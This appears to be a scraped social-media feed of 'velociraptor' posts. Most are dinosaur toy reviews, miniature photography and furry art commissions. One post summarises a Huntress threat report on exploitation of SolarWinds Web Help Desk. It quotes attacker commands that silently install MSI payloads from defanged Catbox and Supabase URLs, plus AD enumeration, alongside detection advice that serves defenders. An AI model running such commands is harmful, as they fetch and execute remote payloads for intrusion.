The current Jurassic World Survival line from Mattel has proven somewhat lackluster so far and put a pause on my Jurassic World toy collecting. As a result, my list of Mattel toys to review has been whittled down to only a few figures, including the remaining ’93 Classic Collection toys. So, the silver lining in this year’s lull is that I can finally feature these toys on the blog, check […]

One year ago today I posted this miniature Jurassic World inspired photo I created, all shot practically using real lighting, figures and miniature sets.

#dinosaurs #jurassicworld #miniatures #lighting #velociraptor #photography #visualart #photo #creativephotography

Rerrr. You should pet me. If you don't, I'm gonna start nosing at your hand and pet myself. Just because I'm a prehistoric predator doesn't mean I can't engage in cat-like behavior.

Forget if I posted this before, but this pic by @BlurTheFur is always worth a smile.

#FurryArt #Velociraptor #chibi #raptor #dinosaur #FeatheredDinosaur #theropod

'Blue and her baby'

One year ago today I posted this miniature Jurassic World inspired photo I created, using real figures, lighting, miniature sets and cotton wool for snow ❄️

#jurassicworld #velociraptor #blue #snow #woodland #wildlife #dinosaurs #jurassicpark #predators #photography #miniatures #movies #visualart #macro #creativephotography #art #actionfigurephotography

[Garry-o-Jelly] Parrot Hydra'd!
Dr. Velo's experiments can be more than legs- How about heads?  Parrot seems to have volunteered :3c

Drawn by @/garryojelly.bsky.social on Bluesky / GrichyinkReally on FA, reward from their Patreon!

#GarryoJelly #GrichyinkReally #hydra #raptor #raptaur #velociraptor #velociraptaur #taur #planedragon #dragon

{ Blood! Dinosaur Violence! }

Commission for treasuresson.bsky.social
featuring Sauron and Talon from Primal Rage!

#dinosaur #dinosaurart #primalrage #furry #furryart #dinosaurs #velociraptor #trex #tyrannosaurus #fightinggame #mastoart #fediart

[TheKoboldKing] Taur Time!
You know what time it is?  Taur time!  >;3c

Patreon reward from @/thekoboldking.bsky.social on Bluesky!

#TheKoboldKing #DrVelo #raptor #raptaur #velociraptor #velociraptaur #taur

----------------

🎯 Threat Intelligence
===================

Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.

Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.

Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.

Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.

Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.

🔹 solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho

🔗 Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399

Valentine Noodles
DM this form to claim a slot:

A,B,or C:
Reference Image(s):
Paypal email:

________Rules_________
-Similar Theropod dinosaurs only like Dilophosaurus/raptors
-Large line changes may cost extra

#mastoArt #furry #furryart #digitalart #art #dinosaur #raptor #utahraptor #velociraptor #theropod